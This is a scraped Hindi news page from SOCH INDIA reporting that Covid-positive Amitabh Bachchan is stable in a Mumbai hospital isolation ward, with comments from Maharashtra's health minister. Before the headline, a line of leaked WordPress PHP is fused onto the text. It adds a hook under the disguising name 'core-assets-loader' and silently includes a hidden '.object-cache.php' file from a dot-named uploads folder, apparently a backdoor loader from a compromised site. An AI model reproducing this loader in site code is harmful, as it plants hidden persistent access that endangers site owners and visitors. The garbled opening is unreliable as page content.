add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोरोना पॉजिटिव अमिताभ बच्चन की हालत स्थिर, अस्पताल ने बताया- आइसोलेशन वार्ड में इलाज जारी – SOCH INDIA
Menu

देश
कोरोना पॉजिटिव अमिताभ बच्चन की हालत स्थिर, अस्पताल ने बताया- आइसोलेशन वार्ड में इलाज जारी

nobanner

कोरोना वायरस की चपेट में आए सदी के महानायक अमिताभ बच्चन की हालत अभी स्थिर बनी हुई है. मुंबई के नानावटी अस्पताल ने एक बयान जारी कर कहा है कि उन्हें कोरोना वायरस के हल्के लक्षण हैं और उन्हें हॉस्पिटल के आइसोलेशन वार्ड में रखा गया है. डॉक्टर की एक टीम लगातार उनकी निगरानी कर रही है. अभिताभ बच्चन ने अस्पताल प्रशासन को बताया कि वे ट्विटर के जरिए अपनी सेहत की जानकारी लगातार देते रहेंगे.

इधर महाराष्ट्र के स्वास्थ्य मंत्री राजेश टोपे ने कहा कि अमिताभ और अभिषेक दोनों को कोरोना के हल्के लक्षण थे. जब इनका रैपिड एंटीजन टेस्ट किया गया तो दोनों कोविड पॉजिटिव पाए गए. इसके बाद इन्हें नानावटी अस्पताल में भर्ती कराया गया. राजेश टोपे ने कहा कि अभी चिंता की कोई बात नहीं है और दोनों की हालत स्थिर है.

11 जुलाई यानी कि शनिवार की देर रात को बिग बी ने खुद के कोरोना संक्रमित होने की जानकारी ट्विटर के जरिए दी थी. अमिताभ बच्चन ने ट्वीट कर कहा था कि मैं कोरोना पॉजिटिव पाया गया हूं, इसके बाद अस्पताल में भर्ती हो गया हूं, अस्पताल ने इसकी सूचना अधिकारियों को दे दी है. मेरे परिवार के लोगों और स्टाफ ने भी कोरोना टेस्ट करवाया है, जिसके नतीजों का इंतजार है.